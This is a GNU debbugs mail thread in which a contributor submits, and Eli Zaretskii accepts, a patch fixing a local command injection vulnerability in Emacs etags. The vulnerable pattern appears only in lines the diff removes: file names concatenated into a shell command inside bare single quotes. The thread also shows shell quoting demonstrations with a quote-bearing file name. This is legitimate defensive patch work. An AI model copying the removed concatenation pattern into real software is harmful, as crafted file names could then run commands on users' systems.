dynamic-looking rDNS -1.0 MAILING_LIST_MULTI Multiple indicators imply a widely-seen list manager 3.2 HELO_DYNAMIC_IPADDR Relay HELO'd using suspicious hostname (IP addr 1) --MP_/c0DjgTV.HH5la7Q4FClfKbi Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Disposition: inline On Tue, 06 Dec 2022 16:52:40 +0200 Eli Zaretskii wrote: > Windows file names cannot include quote characters, so don't use > them. And it's TEMP value that you need to tweak, not the file names > etags scans. Thank you, fixed. > I don't understand why you need an extra pair of quotes in the > expanded string. > > $ echo \''hello; world' > 'hello; world > > As you see, the semi-colon was successfully hidden from the shell. > > What am I missing? $ echo Emacs > "'hello'world" $ cat '\''hello\''world' <---- use \'', error cat: '\hello\world': No such file or directory $ cat ''\''hello'\''world' <---- use '\'' Emacs You can also refer to: 1. https://stackoverflow.com/questions/48970174/escape-single-quote-in-command-argument-to-sh-c 2. And I found a similar function in PHP: $ cat test.php From d1dd12396b7d99ff93e6a846c96ae600addac847 Mon Sep 17 00:00:00 2001 From: lu4nx Date: Tue, 6 Dec 2022 15:42:40 +0800 Subject: [PATCH] Fix etags local command injection vulnerability * lib-src/etags.c: (escape_shell_arg_string): New function. --- lib-src/etags.c | 63 +++++++++++++++++++++++++++++++++++++++++++++---- 1 file changed, 58 insertions(+), 5 deletions(-) diff --git a/lib-src/etags.c b/lib-src/etags.c index d1d20858cd..ba0092cc63 100644 --- a/lib-src/etags.c +++ b/lib-src/etags.c @@ -401,6 +401,7 @@ #define xrnew(op, n, m) ((op) = xnrealloc (op, n, (m) * sizeof *(op))) static void put_entries (node *); static void cleanup_tags_file (char const * const, char const * const); +static char *escape_shell_arg_string (char *); static void do_move_file (const char *, const char *); static char *concat (const char *, const char *, const char *); static char *skip_spaces (char *); @@ -1713,13 +1714,16 @@ process_file_name (char *file, language *lang) else { #if MSDOS || defined (DOS_NT) - char *cmd1 = concat (compr->command, " \"", real_name); - char *cmd = concat (cmd1, "\" > ", tmp_name); + int buf_len = strlen (compr->command) + strlen (" \"\" > \"\"") + strlen (real_name) + strlen (tmp_name) + 1; + char *cmd = xmalloc (buf_len); + snprintf (cmd, buf_len, "%s \"%s\" > \"%s\"", compr->command, real_name, tmp_name); #else - char *cmd1 = concat (compr->command, " '", real_name); - char *cmd = concat (cmd1, "' > ", tmp_name); + char *new_real_name = escape_shell_arg_string (real_name); + char *new_tmp_name = escape_shell_arg_string (tmp_name); + int buf_len = strlen (compr->command) + strlen (" > ") + strlen (new_real_name) + strlen (new_tmp_name) + 1; + char *cmd = xmalloc (buf_len); + snprintf (cmd, buf_len, "%s %s > %s", compr->command, new_real_name, new_tmp_name); #endif - free (cmd1); inf = (system (cmd) == -1 ? NULL : fopen (tmp_name, "r" FOPEN_BINARY)); @@ -7707,6 +7711,55 @@ etags_mktmp (void) return templt; } +/* + * Adds single quotes around a string, if found single quotes, escaped it. + * Return a newly-allocated string. + * + * For example: + * escape_shell_arg_string("test.txt") => 'test.txt' + * escape_shell_arg_string("'test.txt") => ''\''test.txt' + */ +static char * +escape_shell_arg_string (char *str) +{ + char *p = str; + int need_space = 2; /* ' at begin and end */ + + while (*p != '\0') + { + if (*p == '\'') + need_space += 4; /* ' to '\'', length is 4 */ + else + need_space++; + + p++; + } + + char *new_str = xnew (need_space + 1, char); + new_str[0] = '\''; + new_str[need_space-1] = '\''; + + int i = 1; /* skip first byte */ + p = str; + while (*p != '\0') + { + new_str[i] = *p; + if (*p == '\'') + { + new_str[i+1] = '\\'; + new_str[i+2] = '\''; + new_str[i+3] = '\''; + i += 3; + } + + i++; + p++; + } + + new_str[need_space] = '\0'; + return new_str; +} + static void do_move_file(const char *src_file, const char *dst_file) { -- 2.38.1 --MP_/c0DjgTV.HH5la7Q4FClfKbi-- From debbugs-submit-bounces@debbugs.gnu.org Tue Dec 06 11:15:10 2022 Received: (at 59817-done) by debbugs.gnu.org; 6 Dec 2022 16:15:10 +0000 Received: from localhost ([127.0.0.1]:43763 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2ab8-0005NS-BU for submit@debbugs.gnu.org; Tue, 06 Dec 2022 11:15:10 -0500 Received: from eggs.gnu.org ([209.51.188.92]:47310) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1p2ab4-0005Mk-MH for 59817-done@debbugs.gnu.org; Tue, 06 Dec 2022 11:15:09 -0500 Received: from fencepost.gnu.org ([2001:470:142:3::e]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p2aaw-0002ba-NE; Tue, 06 Dec 2022 11:14:58 -0500 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=gnu.org; s=fencepost-gnu-org; h=References:Subject:In-Reply-To:To:From:Date: mime-version; bh=oOSGzEfqCNCPR4kmRGZaDNTslZxIFpXQtKq2VJrWNiw=; b=aa+x8ehQn3wO f9MJVizsr7wLxxwzt/6wjZksuBl+PYyEJMDhTFYCEz+ktpJQE14RFUPY28x2Uv6xjXijKubF+1T+y 4qaqKKAA2L8l5XU5w0nqIsxBLNm7Jst3THcc7rE2+KAQHjd/i9e/jqXB1Fj08qyTzrvD2IFfcx0TK YXPwTsUlzrC6zg+GMfeykf0Egl5w3lwF5OmpwxyQsVucVn7ejDrW9KLz4Y7u4O4TC6HjDtg0sfVAl LKR5LoWZcm6h9zh1B9YXN4Xk4PRj8tW+oQoHW5QgGK+L0LucvmkkwNaPDtly9Ce9j4DT4AS1qGgjc e9z/R6J69bPIofaFq08KnQ==; Received: from [87.69.77.57] (helo=home-c4e4a596f7) by fencepost.gnu.org with esmtpsa (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1p2aav-0004RA-8R; Tue, 06 Dec 2022 11:14:58 -0500 Date: Tue, 06 Dec 2022 18:14:43 +0200 Message-Id: <83359s7bm4.fsf@gnu.org> From: Eli Zaretskii To: lux In-Reply-To: (message from lux on Tue, 6 Dec 2022 23:49:05 +0800) Subject: Re: bug#59817: [PATCH] Fix etags local command injection vulnerability References: <83r0xf9qsx.fsf@gnu.org> <834jua9ggd.fsf@gnu.org> <83lenk7kuq.fsf@gnu.org> <83bkog7fev.fsf@gnu.org> X-Spam-Score: -2.3 (--) X-Debbugs-Envelope-To: 59817-done Cc: stefankangas@gmail.com, 59817-done@debbugs.gnu.org X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: debbugs-submit-bounces@debbugs.gnu.org Sender: "Debbugs-submit" X-Spam-Score: -3.3 (---) > Date: Tue, 6 Dec 2022 23:49:05 +0800 > From: lux > Cc: stefankangas@gmail.com, 59817@debbugs.gnu.org > > >From d1dd12396b7d99ff93e6a846c96ae600addac847 Mon Sep 17 00:00:00 2001 > From: lu4nx > Date: Tue, 6 Dec 2022 15:42:40 +0800 > Subject: [PATCH] Fix etags local command injection vulnerability > > * lib-src/etags.c: > > (escape_shell_arg_string): New function. Thanks, installed with some minor changes. From unknown Fri Jun 20 07:16:49 2025 Received: (at fakecontrol) by fakecontrolmessage; To: internal_control@debbugs.gnu.org From: Debbugs Internal Request Subject: Internal Control Message-Id: bug archived. Date: Wed, 04 Jan 2023 12:24:05 +0000 User-Agent: Fakemail v42.6.9 # This is a fake control message. # # The action: # bug archived. thanks # This fakemail brought to you by your local debbugs # administrator